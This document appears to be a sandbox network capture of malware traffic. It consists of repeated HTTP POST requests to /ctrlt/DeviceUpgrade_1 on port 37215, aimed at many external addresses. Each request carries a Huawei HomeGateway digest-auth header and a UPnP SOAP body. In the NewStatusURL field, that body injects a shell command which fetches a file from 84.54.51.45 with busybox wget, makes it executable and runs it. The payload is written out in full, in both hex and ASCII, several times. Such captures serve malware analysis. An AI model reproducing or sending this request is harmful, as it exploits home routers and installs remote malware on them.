                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1855192.168.2.153608041.85.238.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466387033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1856192.168.2.154362841.56.61.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466411114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1857192.168.2.154190841.182.237.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466427088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1858192.168.2.155146041.220.197.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466442108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1859192.168.2.154375641.255.103.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466470957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1860192.168.2.153943041.117.191.8437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466515064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1861192.168.2.153850441.239.240.11637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466535091 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1862192.168.2.153347441.77.100.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466536045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1863192.168.2.154943641.192.56.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466553926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1864192.168.2.155467241.71.111.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466578007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
